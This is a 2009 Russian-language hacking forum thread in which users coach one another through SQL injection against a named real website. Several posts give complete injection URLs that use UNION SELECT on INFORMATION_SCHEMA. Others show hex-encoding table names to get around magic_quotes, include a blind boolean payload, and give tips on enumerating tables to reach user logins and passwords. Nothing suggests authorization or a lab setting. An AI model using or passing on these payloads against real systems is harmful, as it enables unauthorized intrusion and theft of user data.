
08.11.2009, 18:06
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от Ins3t
Хотябы тем, что он имеет ограничение на размер выводимых данных.
Опять же в зависимости от ситуации и настроек администратора... именно поэтому были ещё вопросы 
|
|
|

08.11.2009, 19:41
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
не могу дальше ничего сделать
http://www.goszakaz.inconnect.ru/?id=10001&n=-3402+union+select+1,COLUMN_NAME,3,4,5,6+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=user_privil eges--
пробовал перебовать и нех и просто с кавычками и с %27 - результата нет!
расскажите, что дальше?
|
|
|

08.11.2009, 19:45
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
WHERE+TABLE_NAME=0x757365725f70726976696c65676573
Все работает
InFlame, заюзай мор1ров например
var=blabla'+or+if(substring((select+version()),1,1 )=5,1,(select+1+union+select+2))--+
Последний раз редактировалось ElteRUS; 08.11.2009 в 19:53..
|
|
|

08.11.2009, 19:45
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 jecka3000
http://www.goszakaz.inconnect.ru/?id=10001&n=-3402+union+select+1,COLUMN_NAME,3,4,5,6+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x757365725 f70726976696c2065676573--
|
|
|

08.11.2009, 19:47
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
USER_PRIVILEGES - таблица базы Information_schema. Никакой полезной инфы для тебя (пассы, логины и т.Д.) она не даст
|
|
|

08.11.2009, 19:53
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
Понимаю. Я написал с мыслью о том что он будет ее юзать, узнав поля
|
|
|

08.11.2009, 19:54
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2[x60]unu
Не обязательно хекс, можно и в чар например.
И в даном случае кавычки не прокатят скорее всего из за magic_quotes = on.
|
|
|

08.11.2009, 19:54
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Bb0y,это я уже понял, но просто ничего более подходящего там вообще нет!)
Я нашел абсолютно все table_name (софтиной) и ничего подозрительного, типа таблицы user там нет)
|
|
|

08.11.2009, 19:57
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2jecka3000
Данные которые ты ищешь не обязательно должны храниться в базе данных.
По поводу таблиц: 17 первых - это стандартные в них можно даже не смотреть(если нету необходимости), и когда перебираешь таблицы лимитом можно начинать не с 1,1 а с 17,1
|
|
|

08.11.2009, 20:02
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от Ins3t
2jecka3000
Данные которые ты ищешь не обязательно должны храниться в базе данных.
а где же еще храниться инфе о юзерах,в текствых файлах?
я говорю о данных простых пользователей
+ данный сайт использует БД
то зачем извращаться данными в файлах?
Последний раз редактировалось L I G A; 08.11.2009 в 20:16..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|